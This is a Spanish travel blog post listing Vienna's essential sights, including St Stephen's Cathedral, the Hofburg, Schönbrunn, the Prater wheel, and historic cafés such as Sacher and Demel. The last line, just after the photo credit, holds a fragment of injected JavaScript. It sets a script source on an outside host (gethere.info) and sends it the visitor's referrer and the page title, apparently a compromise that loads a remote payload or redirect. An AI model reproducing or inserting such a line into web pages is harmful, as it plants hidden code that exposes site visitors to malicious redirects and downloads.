La Viena más imprescindible

07/01/2015

Vienna. Graben. Viena

Si tenéis en mente escaparos a Viena, este post os gustará. Os traemos una lista de esos imprescindibles que no os podéis perder en la ciudad austriaca más palaciega, artística e intelectual.

¡Arrancamos!:

  • Centro histórico. Es bastante evidente que el imprescindible número uno de una ciudad europea, rica en cultura y en historia, es recorrer de arriba a abajo y de abajo a arriba su casco viejo. El centro vienés forma parte de la lista del Patrimonio Mundial de la Unesco, y por tanto, callejear  por la zona, descubriendo casonas, iglesias o jardines es fundamental.
  • Avenida Ringstrasse. Tal vez, la avenida más importante de la ciudad. Súbete al tranvía número uno, rodearás el centro histórico vienés y alucinarás con su majestuosidad imperial.
  • Catedral de San Esteban. Muestra de un soberbio gótico centroeuropeo, subir a su torre es todo un must: 135 metros de altura que os ofrecen unas vistas inigualables de Viena. Una vez en la catedral, fijaos en el edificio vecino, acristalado, moderno e importante. Mataréis dos pájaros de un tiro.
  • Hofburg, Palacio Imperial. No os podéis perder la que fuera residencia de emperadores durante seis siglos y medio. La confluencia de estilos arquitectónicos refleja fielmente esos siglos y convierte la visita en algo tan prioritario como interesante. Aún se respira parte del espíritu de Sissí Emperatriz.
  • Schloss Schönbrunn. La residencia de verano de los emperadores, es el ejemplo que mejor refleja la grandiosidad de aquellas épocas. Vivían por todo lo alto. Así lo demuestra este palacete situado en los alrededores de Viena que cuenta con nada más y nada menos que, ¡1441 habitaciones!
  • Barrio de los Museos. En una ciudad con una riqueza artística como Viena, era inevitable que existiera un barrio dedicado a museos. Opciones para todos los gustos y colores. Dos ejemplos os damos: Museo Leopold -arte moderno austriaco, cuenta con la mejor colección del país- y Museo MUMOK -se dedica a los grandes nombres del arte mundial del siglo XX-.
  • La Riesenrad, la noria del Prater, el parque de atracciones de la ciudad. Puede que su fama se la deba en realidad a esa mítica escena de la película El tercer hombre. Lo que si sabemos de verdad, es que subir a ella y ver la ciudad desde sus alturas es una experiencia inolvidable.
  • La zona de Freihausviertel. Bienvenidos a la zona más comercial de Viena. Callejeando por esta zona encontraréis moda y diseño para todos los gustos y a todos los niveles: desde mercadillos hasta boutiques de renombre internacional.
  • Cafés con historia. La cultura vienesa del café es conocida en todo el mundo. Así que, no podemos irnos de la ciudad sin relajarnos en uno de sus míticos locales durante un rato. Acompañar ese café de una sabrosa tarta puede ser la mejor de las opciones. Os proponemos dos lugares: el Sacher -ofrece la mejor tarta de chocolate de toda Viena- y el Demel -probar su tarta de turrón es una experiencia aparte-.
  • Música. La guinda del pastel en esta ciudad no puede ser otra que asistir a un concierto de música. Hacerlo en la Staatsoper, la Ópera Estatal, sería formidable. Eso sí, si no puede ser aquí, no os agobiéis… Si algo sobra en Viena, son salas recomendables en las que disfrutar de un buen concierto 🙂 .

Foto | J. A. Alcaides.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;